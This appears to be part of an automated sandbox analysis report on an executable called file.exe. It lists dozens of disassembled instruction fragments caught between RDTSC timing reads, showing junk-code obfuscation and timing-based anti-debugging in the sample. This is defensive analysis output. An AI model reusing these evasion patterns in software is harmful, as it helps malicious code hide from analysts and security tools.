                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504E26 second address: 504E53 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E60CAC68Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5E60CAC696h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504E53 second address: 504E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504E57 second address: 504E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B79 second address: 512B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F5E60BA1661h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5189CD second address: 5189D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5189D7 second address: 5189DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518B3C second address: 518B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F5E60CAC68Bh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518B53 second address: 518B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jl 00007F5E60BA1656h 0x0000000f pop esi 0x00000010 jbe 00007F5E60BA165Ah 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518B6D second address: 518B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F5E60CAC686h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518B79 second address: 518B8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60BA1656h 0x00000008 jl 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525115 second address: 525119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52CD6C second address: 52CD8B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60BA1656h 0x00000008 jnc 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F5E60BA165Dh 0x00000016 pop edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B81C second address: 52B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F5E60CAC686h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B82D second address: 52B833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B833 second address: 52B837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C007 second address: 52C00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C00B second address: 52C011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C011 second address: 52C029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E60BA165Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532B6A second address: 532B74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60CAC692h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5326A8 second address: 5326FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 jl 00007F5E60BA1656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F5E60BA165Ch 0x00000015 popad 0x00000016 push edx 0x00000017 jmp 00007F5E60BA165Ch 0x0000001c push ecx 0x0000001d jmp 00007F5E60BA1663h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C91 second address: 535C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C97 second address: 535C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C9E second address: 535CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC694h 0x00000009 js 00007F5E60CAC686h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007F5E60CAC695h 0x00000019 pop ecx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535CD7 second address: 535CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535CDD second address: 535CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC696h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546660 second address: 54667C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1668h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5405E4 second address: 5405ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5405ED second address: 5405F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5405F1 second address: 540605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F5E60CAC686h 0x0000000e jo 00007F5E60CAC686h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DDD1 second address: 56DDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DDD7 second address: 56DDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F5E60CAC686h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DDE3 second address: 56DDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DDFA second address: 56DE07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F5E60CAC686h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56CF4F second address: 56CF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56CF53 second address: 56CF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0AF second address: 56D0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D0B5 second address: 56D0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F5E60CAC68Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnc 00007F5E60CAC686h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D24E second address: 56D252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D252 second address: 56D256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D6B8 second address: 56D6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D6BC second address: 56D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E60CAC691h 0x0000000b jl 00007F5E60CAC68Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D6DB second address: 56D6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D6E3 second address: 56D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC690h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D6F7 second address: 56D709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F492 second address: 56F496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F496 second address: 56F49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571D26 second address: 571D4E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60CAC69Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571D4E second address: 571D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572012 second address: 572016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572016 second address: 57201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57201C second address: 572020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5720E1 second address: 5720F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E60BA1658h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F5E60BA1664h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5720F8 second address: 5721A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F5E60CAC688h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D216Ah], edx 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F5E60CAC688h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov dx, 09AEh 0x0000004b movzx edx, si 0x0000004e call 00007F5E60CAC689h 0x00000053 push eax 0x00000054 jnp 00007F5E60CAC68Ch 0x0000005a jg 00007F5E60CAC686h 0x00000060 pop eax 0x00000061 push eax 0x00000062 jp 00007F5E60CAC69Ah 0x00000068 mov eax, dword ptr [esp+04h] 0x0000006c pushad 0x0000006d jmp 00007F5E60CAC696h 0x00000072 pushad 0x00000073 jne 00007F5E60CAC686h 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5721A6 second address: 5721BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a jg 00007F5E60BA1656h 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572452 second address: 5724A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jng 00007F5E60CAC6A4h 0x00000013 call 00007F5E60CAC697h 0x00000018 mov edx, dword ptr [ebp+122D38B3h] 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D3514h] 0x00000025 jo 00007F5E60CAC68Ch 0x0000002b mov edx, dword ptr [ebp+122D2039h] 0x00000031 push CFD41F00h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push edi 0x0000003a pop edi 0x0000003b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5724A4 second address: 5724C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573CD2 second address: 573CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5E60CAC686h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57383A second address: 573851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1663h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573851 second address: 573869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575696 second address: 57569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70E6B second address: 4A70E88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70E88 second address: 4A70E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA165Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70E98 second address: 4A70E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70E9C second address: 4A70EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F5E60BA165Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, esi 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70EB7 second address: 4A70F18 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E60CAC68Ah 0x00000008 xor si, 8A98h 0x0000000d jmp 00007F5E60CAC68Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, ebx 0x0000001d pushfd 0x0000001e jmp 00007F5E60CAC697h 0x00000023 sbb ecx, 5297E00Eh 0x00000029 jmp 00007F5E60CAC699h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70F18 second address: 4A70F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60DB4 second address: 4A60DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60DBA second address: 4A60DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA09D8 second address: 4AA0A2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60CAC697h 0x00000009 and cx, 9E9Eh 0x0000000e jmp 00007F5E60CAC699h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 jmp 00007F5E60CAC68Ah 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ah, bh 0x00000025 mov cx, B2E5h 0x00000029 popad 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A400E3 second address: 4A40161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov bl, al 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F5E60BA1668h 0x0000000f jmp 00007F5E60BA1662h 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F5E60BA1661h 0x0000001e mov ebp, esp 0x00000020 jmp 00007F5E60BA165Eh 0x00000025 push dword ptr [ebp+04h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F5E60BA165Dh 0x00000030 jmp 00007F5E60BA1660h 0x00000035 popad 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40161 second address: 4A401A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov al, 24h 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 push dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, 2A186A8Bh 0x0000001e pushfd 0x0000001f jmp 00007F5E60CAC690h 0x00000024 or si, FA98h 0x00000029 jmp 00007F5E60CAC68Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60B39 second address: 4A60BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E60BA1661h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 mov bx, si 0x00000017 popad 0x00000018 mov ax, 12F1h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60BA1669h 0x00000026 or cx, 5036h 0x0000002b jmp 00007F5E60BA1661h 0x00000030 popfd 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F5E60BA165Dh 0x0000003a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60BBB second address: 4A60BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60BC1 second address: 4A60BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60670 second address: 4A60695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov di, CF80h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60695 second address: 4A606D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 511063ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F5E60BA1665h 0x0000000e push ecx 0x0000000f pop edi 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E60BA1666h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A606D0 second address: 4A606E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A606E2 second address: 4A60714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5E60BA1666h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dl, EBh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603DA second address: 4A603E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A701B4 second address: 4A701FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60BA1661h 0x00000009 xor eax, 6491E9E6h 0x0000000f jmp 00007F5E60BA1661h 0x00000014 popfd 0x00000015 call 00007F5E60BA1660h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop edx 0x00000024 mov edx, eax 0x00000026 popad 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA094A second address: 4AA098F instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F5E60CAC690h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5E60CAC690h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F5E60CAC690h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA098F second address: 4AA09AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80246 second address: 4A8024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8024C second address: 4A80269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1669h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80269 second address: 4A8026D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8026D second address: 4A8028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA1663h 0x00000010 rdtsc
